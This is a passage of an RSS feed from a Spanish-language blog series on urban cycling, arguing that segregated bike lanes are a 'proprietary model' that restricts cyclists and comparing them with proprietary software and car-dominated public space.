conveniencia, simplicidad y facilidad de uso (puesto que el ciclista no necesita conocer, y por tanto respetar, ninguna de las normas de trafico en ciudad adhiriendo al modelo). Esto es tanto más así desde el momento en que se hace abstracción de las implicaciones y consecuencias del modelo, puesto que solamente se considera el bien individual (comodidad del ciclista al disponer de una vía exclusiva a su disposición) y no el bien común (muchas veces el modelo se vé favorecido en detrimento de los demás usuarios del espacio público, en general del transporte publico y en particular de los peatones, una vez más). Desde el punto de vista del modelo propietario, únicamente el beneficio económico inmediato es relevante, como se ha visto (indirectamente en este caso, obteniendo la desaparición de los ciclistas de la calzada). Se procura captar poco a poco nuevos usuarios (aquellos menos experimentados), limitando de manera progresiva su libertad de elección (implantación gradual de vías exclusivas segregadas en puntos estratégicos, con el objetivo de habituar a su uso poco a poco al usuario creando una dependencia), educándoles desde muy pronto en la existencia de un único modelo segregador (los niños han de circular por vías exclusivas segregadas), al que el usuario debera adaptarse independientemente de sus necesidades particulares (no importa el destino, el entorno o el ciclista, pues una unica solucion segregadora se propone), convenciéndoles de que esta opción es la correcta al no tener conocimiento de alternativas mas naturales (como la circulación integradora en calzada), o persuadiéndoles de que se trata de alternativas complejas, al alcance de solamente unos pocos y sobre todo inseguras. Es por ello que el modelo propietario se asocia a menudo a la noción de pensamiento único, englobando todo lo anterior, que sera quien le proporcione su marco de legitimidad. br/&#xA;Una vez que el usuario accede y se habitúa al modelo propietario de vías exclusivas segregadas es muy difícil salir de él debido a su propia concepción (pues se crea una relación de dependencia), siguiendo un camino siempre descendente, hasta que ya es demasiado tarde. Esto se puede manifestar en forma de incapacidad física o psicológica de acceder a ninguna otra alternativa (como circular libremente de manera correcta en ciudad, al haberse habituado a hacerlo por vías exclusivas segregadas), falta de los conocimientos (ignorar que circular usando el centro de la calzada es mucho mas seguro para el ciclista) o de la educación necesaria para escapar del modelo (carencia de formación vial), inaccesibilidad económica al mismo (recordar que se trata de un modelo caro, que no todos pueden permitirse), imposibilidad de hacer un correcto uso del modelo (recorridos segregados demasiado absurdos e ineficientes) o incluso un funcionamiento deficiente de este ultimo (recorridos segregados a menudo impracticables o que implican un trayecto excesivamente prolongado). Al haberse imposibilitado el acceso a otras opciones (por falta de habito, por acoso al ciclista, por prohibición explicita de circular en calzada, etc.), el usuario se encuentra en una trampa. Llegados a este punto, el usuario es consciente, quizás ya tarde, de hasta que punto sus posibilidades son limitadas encontrándose, no por casualidad, con que su libertad de elección ha sido coartada de manera considerable, habiéndose convertido en este contexto en una persona dependiente. br/&#xA;&#xA;Referencias&#xA;&#xA;    El origen del problema br/&#xA;    Sobre el pensamiento único ciclista y sus alternativas br/&#xA;    La polarización mundial amenaza al activismo ciclista) br/&#xA;    ¿Qué es un carril-bici urbano? br/&#xA;&#xA;#ciclismourbanolibre #bici br/]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/sobre-la-libertad.png" alt="img"> <br/>
Las dos primeras partes (<a href="https://infosec.press/csantosb/sobre-el-ciclismo-urbano-libre-i" rel="nofollow">i</a>, <a href="https://infosec.press/csantosb/sobre-el-ciclismo-urbano-libre-ii" rel="nofollow">ii</a>) de este artículo se han centrado en la definición de lo que constituyen los modelos libre y propietario genéricos, presentando con algún detalle ejemplos de ambos. Compartiendo características comunes, ciertos modelos propietarios se imponen hoy día de forma mayoritaria remplazando a sus modelos libres respectivos, predominantes en un principio. Un claro ejemplo lo constituye el caso del espacio público entendido como bien común colectivo. A partir de este último, es posible desarrollar una teoría razonada sobre el caso particular de la bicicleta entendida como vehículo urbano libre, objetivo último de este artículo, desarrollando las implicaciones que conlleve el modelo propietario que se derive.  <br/>
<em>Articulo</em> <a href="https://infosec.press/ideas/tag:ciclismourbanolibre" rel="nofollow">Sobre ciclismo urbano libre</a> <br/></p>

<h1 id="modelos-de-ciclismo-urbano-libre-y-propietario">Modelos de ciclismo urbano libre y propietario</h1>

<p>Un último ejemplo de modelo, muy relacionado con el anterior, lo constituye el modelo de ciclismo urbano libre (y por oposición, su modelo equivalente propietario). Este modelo se relaciona con la utilización de la bicicleta en tanto que medio de transporte urbano sostenible, seguro y económico. Es por ello que este modelo se asocia de manera inmediata con el modelo de espacio público libre anterior, siendo un derivado o consecuencia de éste último, predominantes ambos en las ciudades antes de la implantación de sus modelos propietarios respectivos. <br/></p>

<h2 id="modelo-ciclista-libre">Modelo ciclista libre</h2>

<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/ciclismo-libre-3.jpg" alt="img"> <br/>
Desde la perspectiva de este artículo, el modelo de ciclismo urbano libre (o modelo ciclista libre por simplificar en este contexto) se podría definir de forma resumida como aquel que sostiene <em>la posibilidad real de todo ciclista de conseguir desplazarse de manera práctica, eficiente y segura, libremente por toda la ciudad</em>. Este modelo observa a la bicicleta como vehículo de empleo diario de primera categoría, en igualdad de condiciones con el resto de vehículos, y no como un accesorio marginal de segundo nivel, de uso puntual o lucrativo-festivo. La noción de modelo ciclista libre es amplia, pero puede y debe entenderse dentro de un contexto urbano actual, donde es necesario gestionar y compartir el espacio público con los demás usuarios, incluidos tranvías, vehículos a motor, peatones, etc. Esto será así para cualquier tipo de configuración urbana habitual: plataforma única, parque, <a href="https://sede.madrid.es/portal/site/tramites/menuitem.62876cb64654a55e2dbd7003a8a409a0/?vgnextoid=9902b00ce884e410VgnVCM2000000c205a0aRCRD&amp;vgnextchannel=8ed9a38813180210VgnVCM100000c90da8c0RCRD&amp;vgnextfmt=default" rel="nofollow">APR</a>, calzada/acera, etc. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/ciclismo-libre-1.jpg" alt="img"> <br/>
El <a href="https://twitter.com/csantosb/status/1338618249358028804" rel="nofollow">modelo ciclista libre</a> se basa en la capacidad de poder decidir, de manera autónoma e independiente, pero sobre todo libre, el medio de transporte más adaptado pero sobre todo, el itinerario más conveniente a las necesidades del usuario, respetando siempre a todos los demás usuarios del espacio público mediante el establecimiento de unas normas básicas comunes de convivencia en forma de prioridades, delimitación de circulación, etc. Dentro de estas regulaciones impuestas por la necesidad de compartir de forma ordenada un bien común, el espacio público, el ciclismo libre reclama la libertad de poder desplazarse sin otros condicionantes adicionales añadidos artificialmente. Cabe notar una vez más que este modelo libre, al igual que los anteriormente mencionados, ha sido mayoritario en muchas ciudades (con mayor o menor tradición ciclista) y se ha mostrado eficiente y práctico: tanto por su velocidad media, como por las distancias que se pueden llegar a cubrir, la bicicleta es un medio de transporte económico y no contaminante especialmente bien adaptado a los entornos urbanos. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/ciclismo-libre-2.jpg" alt="img"> <br/>
A lo anterior cabe añadir el hecho de que una bicicleta, como vehículo habitual, comprende una mecánica y un mantenimiento lo suficientemente sencillos como para poder ser observado como un modelo abierto, en el que es relativamente sencillo aprender, intercambiar piezas y conocimientos e interactuar entre usuarios de cara a su correcto funcionamiento. En este punto en particular el paralelismo con el modelo de código libre es evidente. De la misma manera, es posible formar y acompañar de manera abierta y sencilla a nuevos ciclistas, tanto en su aprendizaje de las normas de circulación urbanas, como en cuanto al mantenimiento de su vehículo. <br/>
Este modelo, <a href="https://twitter.com/csantosb/status/1343981098079023105" rel="nofollow">mayoritario en un origen</a> en las ciudades, legitima al ciclista y le permite circular libremente por toda la ciudad, siendo habitual observar la cohabitación pacifica de ciclistas, peatones y medios de transporte público eléctricos, junto a la presencia de escasos vehículos a motor individuales. Al tratarse de un vehículo poco voluminoso y eficiente, que permite recorrer cómodamente distancias habituales en un entorno urbano, la bicicleta se impone naturalmente como una alternativa convivial y agradable que permite al ciclista circular por la calzada en toda libertad. En ningún momento se plantea la necesidad de limitar artificialmente los desplazamientos ciclistas. Sin embargo, al igual que en el caso de los modelos de código y de espacio público libres, el modelo ciclista libre ha sido hoy en día <a href="https://twitter.com/csantosb/status/1333372057372020737" rel="nofollow">remplazado</a>: frente al modelo ciclista libre se ha terminado imponiendo un modelo ciclista propietario, caracterizado por la <a href="https://twitter.com/MarsFlyerPaul/status/1173533511975940097" rel="nofollow">segregación exclusivista del ciclista</a>, que limita los desplazamientos de los ciclistas a los que expulsa de la calzada que venian ocupando hasta entonces, quedando éstos arrinconados en vías segregadas, <a href="https://twitter.com/dirkjanjanssen/status/1174778843757973504" rel="nofollow">peligrosas e ineficaces</a>, que les sitúan fuera del trafico, obligándoles a circular y situándoles a menudo en <a href="https://twitter.com/cm_hh/status/1250177303260340224" rel="nofollow">posicion de peligro</a>. <br/></p>

<h2 id="modelo-ciclista-propietario">Modelo ciclista propietario</h2>

<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/ciclismo-propietario-1.jpg" alt="img"> <br/>
Este modelo propietario tiene su origen y se entiende mejor a partir de la eclosión y proliferación del vehículo a motor en las ciudades <a href="https://csantosb-blogs.gitlab.io/blog-personal/posts/origen-del-problema/index.html" rel="nofollow">[1]​</a>, momento en el cual estos vehículos reclaman para ellos la mayor parte del espacio publico disponible, como se pudo ver anteriormente. Al igual que los peatones y el transporte publico eléctrico, el ciclismo libre supone un serio obstáculo a la ambición desmesurada del modelo propietario del espacio publico, lo que conlleva la aparición del modelo ciclista propietario, <a href="https://twitter.com/csantosb/status/1334857722064478209" rel="nofollow">consecuencia del primero</a>. Si se tiene en cuenta lo expuesto previamente en este articulo, se puede entender fácilmente la necesidad de erradicar el ciclismo libre por el bien del vehículo a motor privado, como vía para la consecución de un beneficio económico inmediato indirecto. Con esta finalidad, al igual que en el caso de los dos modelos mencionados anteriormente, se recurrirá a dos recursos argumentales habituales característicos de los modelos propietarios. <br/>
En primer lugar, el modelo propietario se sustentará en la idea de un pensamiento único <a href="https://csantosb-blogs.gitlab.io/blog-personal/posts/pensamiento-%C3%BAnico-ciclista/index.html" rel="nofollow">[2]​</a>, que le proporcionará su marco de legitimidad y se propagará hasta convertirse en omnipresente, negando todo desacuerdo o modelo alternativo. Este pensamiento único tendrá como finalidad inconfundible la creación de vías ciclistas exclusivas segregadas aun en ciudades donde ya es posible usar la bicicleta <a href="https://www.youtube.com/playlist?list=PL3kJ42xCC5xa46GUNL633jzfXMMHo39ke" rel="nofollow">como vehículo habitual</a>, desligitimando su uso libre y <a href="https://www.youtube.com/playlist?list=PL3kJ42xCC5xa-LrwGybkobdDrEkkM7OnT" rel="nofollow">expulsando a los ciclistas</a> de la circulación. El objetivo no declarado de <a href="https://twitter.com/AhoraMadrid/status/867673316701720576" rel="nofollow">no “entorpecer”</a> a los vehículos a motor, con mayor velocidad punta que no promedio, será obviado por este pensamiento único y se convertirá así en un argumento implícito incómodo, aun siendo su razón de ser original y prácticamente exclusiva. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/bici-miedo-1.jpg" alt="img"> <br/>
Un segundo recurso argumental habitual a favor de los modelos propietarios se dará también en este caso, de manera similar a los modelos vistos anteriormente. Este recurso consiste en hacer todo lo posible por difundir la idea de una supuesta inseguridad de los adeptos al modelo ciclista libre, que deberán así plegarse y aceptar el modelo propietario por su propia protección. Esta idea, fundamentada en el hecho de no desear compartir el espacio público en calzada con coches y motos de gran cilindrada (grandes productores de contaminación sonora y ambiental, acaparadores del espacio público, productores de atascos y no respetuosos de los límites de velocidad), conduce arbitrariamente como conclusión interesada a la necesidad de construir vías exclusivas segregadas para un tipo de vehículo unicamente, la bicicleta, quien de esta manera no se vería obligada a compartir el espacio público con los demás vehículos. Siguiendo con esta lógica, se concluye que sería necesario desarrollar costosas infraestructuras y redes segregadas fuera de la calzada compartida para uso exclusivo ciclista, quienes de esta manera se verían ya incapacitados para poder circular libremente en ciudad, como han venido haciendo hasta ese momento. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/bici-miedo-3.jpg" alt="img"> <br/>
Esta incapacitación efectiva del ciclista para poder circular libremente por la ciudad, tanto explicita por medio de <a href="https://twitter.com/csantosb/status/1341679069386170368" rel="nofollow">paneles de obligación</a> de uso de las vías exclusivas segregadas, como implícita a partir del <a href="https://www.youtube.com/playlist?list=PL3kJ42xCC5xa-LrwGybkobdDrEkkM7OnT" rel="nofollow">acoso</a> de los vehículos de motor en presencia de vías exclusivas segregadas, puede ser entendida como una consecuencia última inevitable del modelo ciclista propietario, pero ha de ser sobre todo comprendida como su objetivo original primero y casi exclusivo. Se obtiene así el beneficio económico inmediato indirecto de este modelo propietario: la erradicación de una “molestia” de la calzada. A menudo, se llega incluso a recurrir como único argumento a favor de la inversión en vías exclusivas segregadas la protección de sectores de la población frágiles (niños, personas mayores o con movilidad reducida, etc.), a pesar de que se observa sistemáticamente como en presencia de vías ciclistas exclusivas segregadas, <a href="https://twitter.com/csantosb/status/1335917015266156548" rel="nofollow">resulta prácticamente imposible</a> apreciar presencia alguna de ese tipo de población en estas vías. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/bici-miedo-2.jpg" alt="img"> <br/>
El modelo propietario ciclista responde al comportamiento general de todo modelo propietario. Por una parte, se limitan las opciones a las que tiene acceso el usuario, quien pasa de poder circular libremente por toda la ciudad a deber hacerlo únicamente por un cierto número de vías exclusivas segregadas, allí donde no suponga una “molestia”. Se le obliga así a optar por un numero reducido de alternativas en forma de recorridos ineficientes, muy limitados, invariablemente los mismos independientemente de las necesidades particulares o el destino de cada ciclista. Por otro lado, se obvian las consecuencias del modelo, siendo tan solo relevante el beneficio económico inmediato indirecto que se pueda obtener (apartar al ciclista de la circulación). Siendo asimismo un modelo individualista y egocéntrico, implícitamente se excluye la necesidad equivalente de deber desarrollar las mismas costosas infraestructuras segregadas para todo tipo de vehículo que no deseara compartir el espacio público con los vehículos a motor. Por qué un ciclomotor no tendría el mismo privilegio? y los vehículos de movilidad personal? en caso de <a href="https://twitter.com/csantosb/status/1342408698698850304" rel="nofollow">atascos ciclistas</a> en la vía segregada, sería necesario crear otra vía segregada? y que sucede con los vehículos a motor que si respetan los límites de velocidad de 30 km/h? y con aquellas personas que no se consideran capacitados para circular en ciudad con otros vehículos de motor no respetuosos, pero si lo hacen en entornos más calmados? las personas mayores y los niños pequeños deberían compartir vías exclusivas ciclistas segregadas con adultos circulando a mucha mayor velocidad, poniéndoles así en peligro? sería necesaria <a href="https://www.gracq.org/actualites-du-velo/bliksemsnelle-baan" rel="nofollow">una nueva red segregada</a> exclusiva para cada caso? por qué unicamente en el caso de los ciclistas?. <br/>
De manera equivalente a la situación del modelo propietario del espacio público, la lista de agravios producida por el modelo propietario ciclista es interminable, y va siempre en detrimento de la libertad y la seguridad de las personas: imposibilidad de lograr desplazarse libremente, obligación de hacerlo siguiendo itinerarios arrinconados, perdida de eficiencia de la bicicleta como vehículo al obligarle a transitar por recorridos degradados, haciendo imposible una circulación natural, etc. <a href="https://youtu.be/NEainj_l7to" rel="nofollow">[4]​</a>. Las situaciones de riesgo a las que se expone a los ciclistas (cabe recordar en este punto el argumento segregador en favor de su <a href="https://twitter.com/csantosb/status/1337314016121778178" rel="nofollow">supuesta seguridad</a>) <a href="https://twitter.com/csantosb/status/1341682652882079744" rel="nofollow">son innombrables</a>, confinándoles en vías marginales: choques con bordillos graníticos afilados u otros obstáculos en caso de caída; obligación de posicionarse a la derecha en rotondas; posicionamiento sistemático a la derecha del flujo circulatorio <a href="https://twitter.com/csantosb/status/1342407689721303040" rel="nofollow">en cada cruce</a> y en consecuencia dentro del ángulo muerto de visión de los vehículos a motor; obligación de transitar por caminos estrechos, incluso bidireccionales, aumentando así la posibilidad de una colisión frontal y de invasión de carriles cercanos <a href="https://twitter.com/PJUllrich/status/1319600970632921091" rel="nofollow">en caso de caída</a>; imposibilidad de efectuar cambios de carril ni giros en función del destino; cercanía con vehículos aparcados y sus puertas; cruces continuados con trayectorias de lineas de autobús y sus paradas, etc. La lista no tiene fin: el modelo propietario y su pensamiento único asociados <a href="https://www.enbicipormadrid.es/2020/12/la-polarizacion-mundial-amenaza-al.html?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:+EnBiciPorMadrid+(en+bici+por+madrid)" rel="nofollow">[3]​</a> obvian todo lo que no redunde en su propio beneficio. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/freebike.jpg" alt="img"> <br/>
El éxito del modelo propietario, desde el punto de vista del ciclista, reside al igual que en los casos anteriores en su aparente conveniencia, simplicidad y facilidad de uso (<em>puesto que el ciclista no necesita conocer, y por tanto respetar, ninguna de las normas de trafico en ciudad adhiriendo al modelo</em>). Esto es tanto más así desde el momento en que se hace abstracción de las implicaciones y consecuencias del modelo, puesto que solamente se considera el bien individual (<em>comodidad del ciclista al disponer de una vía exclusiva a su disposición</em>) y no el bien común (<em>muchas veces el modelo se vé favorecido en detrimento de los demás usuarios del <a href="https://twitter.com/jlgalego/status/1342420417525514240" rel="nofollow">espacio público</a>, en general del transporte publico y en particular de los peatones, una vez más</em>). Desde el punto de vista del modelo propietario, únicamente el beneficio económico inmediato es relevante, como se ha visto (<em>indirectamente en este caso, obteniendo la desaparición de los ciclistas de la calzada</em>). Se procura captar poco a poco nuevos usuarios (<em>aquellos menos experimentados</em>), limitando de manera progresiva su libertad de elección (<em>implantación gradual de vías exclusivas segregadas en puntos estratégicos, con el objetivo de habituar a su uso poco a poco al usuario creando una dependencia</em>), educándoles desde muy pronto en la existencia de un único modelo segregador (<em>los niños han de circular por vías exclusivas segregadas</em>), al que el usuario debera adaptarse independientemente de sus necesidades particulares (<em>no importa el destino, el entorno o el ciclista, pues una unica solucion segregadora se propone</em>), convenciéndoles de que esta opción es la correcta al no tener conocimiento de alternativas mas naturales (<em>como la <a href="http://madridciclista.org/ciclismo-integrado-madrid/" rel="nofollow">circulación integradora</a> en calzada</em>), o persuadiéndoles de que se trata de alternativas complejas, al alcance de solamente unos pocos y sobre todo inseguras. Es por ello que el modelo propietario se asocia a menudo a la noción de pensamiento único, englobando todo lo anterior, que sera quien le proporcione su marco de legitimidad. <br/>
Una vez que el usuario accede y se habitúa al modelo propietario de vías exclusivas segregadas es muy difícil salir de él debido a su propia concepción (<em>pues se crea una relación de dependencia</em>), siguiendo un camino siempre descendente, hasta que ya es demasiado tarde. Esto se puede manifestar en forma de incapacidad física o psicológica de acceder a ninguna otra alternativa (<em>como circular libremente de manera correcta en ciudad, al haberse habituado a hacerlo por vías exclusivas segregadas</em>), <a href="https://twitter.com/csantosb/status/1341817733575487489" rel="nofollow">falta de los conocimientos</a> (<em>ignorar que circular usando el centro de la calzada es mucho mas seguro para el ciclista</em>) o de la educación necesaria para escapar del modelo (<em>carencia de <a href="https://twitter.com/DGTes/status/1326536408475971587" rel="nofollow">formación vial</a></em>), inaccesibilidad económica al mismo (<em>recordar que se trata de un modelo caro, que no todos pueden permitirse</em>), imposibilidad de hacer un correcto uso del modelo (<em>recorridos segregados demasiado absurdos e ineficientes</em>) o incluso un funcionamiento deficiente de este ultimo (<em>recorridos segregados a menudo impracticables o que implican un trayecto excesivamente prolongado</em>). Al haberse imposibilitado el acceso a otras opciones (<em>por falta de habito, por acoso al ciclista, por prohibición explicita de circular en calzada, etc.</em>), el usuario se encuentra en una trampa. Llegados a este punto, el usuario es consciente, quizás ya tarde, de hasta que punto sus posibilidades son limitadas encontrándose, no por casualidad, con que su libertad de elección ha sido coartada de manera considerable, habiéndose convertido en este contexto en una persona dependiente. <br/></p>

<h1 id="referencias">Referencias</h1>

<p>    <a href="https://infosec.press/csantosb/el-origen-del-problema" rel="nofollow">El origen del problema</a> <br/>
    <a href="https://infosec.press/csantosb/sobre-el-pensamiento-unico-ciclista-y-sus-alternativas" rel="nofollow">Sobre el pensamiento único ciclista y sus alternativas</a> <br/>
    <a href="https://www.enbicipormadrid.es/2020/12/la-polarizacion-mundial-amenaza-al.html?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:+EnBiciPorMadrid+(en+bici+por+madrid)" rel="nofollow">La polarización mundial amenaza al activismo ciclista</a> <br/>
    <a href="https://youtu.be/NEainj_l7to" rel="nofollow">¿Qué es un carril-bici urbano?</a> <br/></p>

<p>#ciclismourbanolibre #bici <br/></p>
]]></content:encoded>
      <author>ideas</author>
      <guid>https://infosec.press/read/a/ir1izpjzpo</guid>
      <pubDate>Sat, 18 Jan 2025 15:59:22 +0000</pubDate>
    </item>
    <item>
      <title>Sobre el ciclismo urbano libre (ii)</title>
      <link>https://infosec.press/ideas/sobre-el-ciclismo-urbano-libre-ii</link>
      <description>&lt;![CDATA[img br/&#xA;La primera parte (i) de este artículo introduce los orígenes del modelo de código informático libre (y por oposición de su modelo propietario), como paradigma de tipos de modelos antagónicos. A partir de este primer ejemplo, las características generales de los modelos propietarios han sido presentadas, al compartir todos ellos numerosos puntos en común que les identifican. Es posible de esta manera encontrar muchos otros exponentes de este tipo de modelos. Uno de ellos será presentado aquí, el cual se relaciona con la noción de espacio público y su uso como bien común destinado a poder desplazarse libremente, haciéndose explícito el paralelismo con lo visto hasta ahora. !--more-- br/&#xA;Articulo Sobre ciclismo urbano libre br/&#xA;&#xA;Modelos de espacio público libre y propietario&#xA;&#xA;img br/&#xA;Un ejemplo interesante y plausible de modelo propietario lo constituye el modelo de espacio público propietario, tan habitual en las ciudades occidentales modernas. Siguiendo con lo anteriormente dicho, es posible realizar una correspondencia entre los conceptos mencionados anteriormente en relación con la libertad de elección, con respecto al uso del espacio público en su sentido más amplio. Para ello, es suficiente con observar como se repartía el espacio público en las ciudades antes de la eclosión en la explotación industrializada de los recursos fósiles. Esencialmente, las personas (los usuarios) tenían completa libertad para poder desplazarse a pie, sin ningún tipo de limitación: no existían las aceras, los pasos de peatones ni los semáforos. Las personas podían transitar por donde lo consideraran necesario. Además, tenían la posibilidad de desplazarse cubriendo distancias mayores (o reduciendo el tiempo del desplazamiento) tanto en tranvía (y metro, allí donde fuera posible) a partir de la llegada de la electricidad, como en bicicleta, el medio de transporte más eficiente en medio urbano (en términos de espacio ocupado, velocidad y rendimiento). En este momento, el espacio público constituye un bien común que todo el mundo comparte, y del que todo el mundo se beneficia. Es el modelo de espacio público libre. br/&#xA;img br/&#xA;Esto fue así hasta el advenimiento del automóvil a motor privado. En algún momento y de manera progresiva, durante la primera mitad del siglo pasado se produce un aumento sustancial en la explotación de los recursos fósiles (sobre todo el petróleo) como fuente de energía, en especial en EE.UU. Este hecho supone una revolución que cambiara la concepción del espacio público: los grandes productores se dan cuenta de que necesitan un medio continuado de dar salida a esos recursos [1]​. La solución ideal reside en eliminar los medios de transporte colectivo basados en la electricidad, en beneficio del transporte individual (existente, pero minoritario hasta entonces) basado en el motor de gasolina, gran consumidor de petroleo. Pero esto no es suficiente: también es necesario apropiarse del espacio público convirtiéndolo en un bien particular. Tratándose por definición de un medio ineficiente en términos de espacio ocupado, y por ello egoísta, con el fin de aumentar su número y por tanto el beneficio económico inmediato generado, es también obligatorio alterar el diseño del espacio público, en detrimento de su uso entendido como bien común. Es el origen del modelo de espacio público propietario [2]​. br/&#xA;La lista de agravios es interminable, y va siempre en detrimento de la libertad de las personas: prohibición de desplazarse libremente, obligación de hacerlo siguiendo itinerarios segregados, imposición de respetar tiempos y vías limitadas para acceder a esos itinerarios. Y esto no será sino el origen: al propagarse el modelo propietario, basado en el uso del vehículo a motor privado, el espacio público como bien común se reduce a su mínima expresión. El modelo propietario es avaro: se eliminan bulevares, se reduce la anchura de los itinerarios segregados para peatones, se talan arboles, se endeuda durante décadas a las personas por el bien de unos cuantos, se degrada su salud de manera irremediable, se alteran para siempre las plazas públicas, destruyendo su riqueza, al ser necesario cada vez más espacio público para almacenar un bien individual … Como todo esto no es suficiente, se ocupan también las vías segregadas de uso peatonal. Es necesario en este punto recordar que el modelo propietario se apropia de un bien común, el espacio público, repartiéndolo para uso y disfrute únicamente de un número reducido de beneficiarios: su propia ineficacia impone un límite al número de participantes en el modelo. br/&#xA;img br/&#xA;img br/&#xA;img br/&#xA;El modo de funcionamiento del modelo de espacio propietario, como método de generación de beneficio económico inmediato, es por regla general siempre el mismo: restringir la libertad de los usuarios del espacio público, de modo que éstos vean limitada su capacidad de elección. El objetivo es obligar al usuario a optar por un panel limitado de opciones, aquellas propuestas por el valedor del modelo, constituyendo éstas las fuentes de beneficios económicos inmediatos. En el otro extremo, el modelo de espacio público favorece la existencia de múltiples opciones de movilidad, anima a compartir el espacio público, fomenta la complementariedad y la intermodalidad de medios de desplazamiento, promoviendo su sostenibilidad y eficiencia, haciéndolo una opción segura. br/&#xA;img br/&#xA;El éxito del modelo propietario reside en su aparente comodidad y facilidad de uso, que se refuerza con la idea de una supuesta seguridad. Se captan nuevos usuarios limitando su libertad de elegir, educándoles desde muy pronto, convenciéndoles de que una opción es la correcta al no tener conocimiento de alternativas posibles. Es por ello que el modelo propietario se asocia a menudo a la noción de pensamiento único [3]​, que le proporciona su legitimidad. Una vez que el usuario accede al modelo de espacio público propietario es muy difícil salir de él por su propia concepción, siguiendo un camino siempre descendente, hasta que ya es demasiado tarde. Esto se puede manifestar en forma de incapacidad de desplazarse libremente, inaccesibilidad económica al modelo, imposibilidad de acceder a comercios en ausencia de un vehículo a motor, o incluso mal funcionamiento de este ultimo. Llegados a este punto, el usuario es consciente, quizás ya tarde, de hasta que punto sus opciones son limitadas encontrándose, no por casualidad, con que su libertad de elección ha dejado de existir, y se ha convertido en una persona dependiente. br/&#xA;img br/&#xA;Un claro ejemplo del modelo de espacio propietario se puede observar hoy en la ciudad de Madrid, donde históricamente se abolió la “la abusiva practica de convertir en sitio de tertulia y hasta de lectura y juegos el centro de las calles y plazas” [4]​. Y esto solo fue el comienzo. Con el objetivo de disponer cada vez más espacio para los vehículos de motor, se talarían plazas enteras y se construirían megaparkings subterráneos, arrasando para siempre estos entornos. Pero esto no bastaba, el modelo de espacio propietario busca siempre acaparar más y más espacio, en detrimento del espacio público entendido como bien común, segregando a quien no se amolde a sus designios. Fue necesario inundar los bulevares peatonales de coches, convirtiéndolos en parkings urbanos, finalmente haciendo desaparecer el bulevar para poder construir autopistas urbanas de cinco carriles en un único sentido … Los ejemplos son innombrables. Heridas urbanas con forma de autopista que seccionan la ciudad en dos, marginando a parte de la población, endeudamientos colosales que la mayoría arrastraría durante décadas, desmantelamiento del sistema de tranvías eléctricos públicos, reducción de itinerarios peatonales a su mínima expresión … Como en muchas otras ciudades, el modelo de espacio propietario no ve fin a su apetito. Únicamente el beneficio económico inmediato tiene sentido a sus ojos. br/&#xA;img br/&#xA;img br/&#xA;Gracias a @latinapaterson, @EscenasUrbanas y @gatopormadrid por su recopilacion de fotografias antiguas de la ciudad br/&#xA;de Madrid br/&#xA;&#xA;Referencias&#xA;&#xA;    El origen del problema br/&#xA;    &#34;Las calles fueron privatizadas y entregadas al trafico y los ninos desaparecieron de ellas&#34; br/&#xA;    El Gobierno inyectara al automovil 10.000 millones de fondos europeos en tres anos br/&#xA;    Cuando los madrileños aprendieron a circular br/&#xA;&#xA;#ciclismourbanolibre #bici br/]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/sobre-la-libertad.png" alt="img"> <br/>
La primera parte (<a href="https://infosec.press/csantosb/sobre-el-ciclismo-urbano-libre-i" rel="nofollow">i</a>) de este artículo introduce los orígenes del modelo de código informático libre (y por oposición de su modelo propietario), como paradigma de tipos de modelos antagónicos. A partir de este primer ejemplo, las características generales de los modelos propietarios han sido presentadas, al compartir todos ellos numerosos puntos en común que les identifican. Es posible de esta manera encontrar muchos otros exponentes de este tipo de modelos. Uno de ellos será presentado aquí, el cual se relaciona con la noción de espacio público y su uso como bien común destinado a poder desplazarse libremente, haciéndose explícito el paralelismo con lo visto hasta ahora.  <br/>
<em>Articulo</em> <a href="https://infosec.press/ideas/tag:ciclismourbanolibre" rel="nofollow">Sobre ciclismo urbano libre</a> <br/></p>

<h1 id="modelos-de-espacio-público-libre-y-propietario">Modelos de espacio público libre y propietario</h1>

<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/pl_mayor_antes.jpg" alt="img"> <br/>
Un ejemplo interesante y plausible de modelo propietario lo constituye el modelo de espacio público propietario, tan habitual en las ciudades occidentales modernas. Siguiendo con lo anteriormente dicho, es posible realizar una correspondencia entre los conceptos mencionados anteriormente en relación con la libertad de elección, con respecto al uso del espacio público en su sentido más amplio. Para ello, es suficiente con observar como se repartía el espacio público en las ciudades antes de la eclosión en la explotación industrializada de los recursos fósiles. Esencialmente, las personas (los usuarios) tenían completa libertad para poder desplazarse a pie, sin ningún tipo de limitación: no existían las aceras, los pasos de peatones ni los semáforos. Las personas podían transitar por donde lo consideraran necesario. Además, tenían la posibilidad de desplazarse cubriendo distancias mayores (o reduciendo el tiempo del desplazamiento) tanto en tranvía (y metro, allí donde fuera posible) a partir de la llegada de la electricidad, como en bicicleta, el medio de transporte más eficiente en medio urbano (en términos de espacio ocupado, velocidad y rendimiento). En este momento, el espacio público constituye un bien común que <a href="https://twitter.com/gatopormadrid/status/1325714642560278528" rel="nofollow">todo el mundo comparte</a>, y del que <a href="https://twitter.com/JoaquimCampa/status/1309953727843971080" rel="nofollow">todo el mundo se beneficia</a>. Es el <em>modelo de espacio público libre</em>. <br/>
<img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/pl_mayor_despues.jpg" alt="img"> <br/>
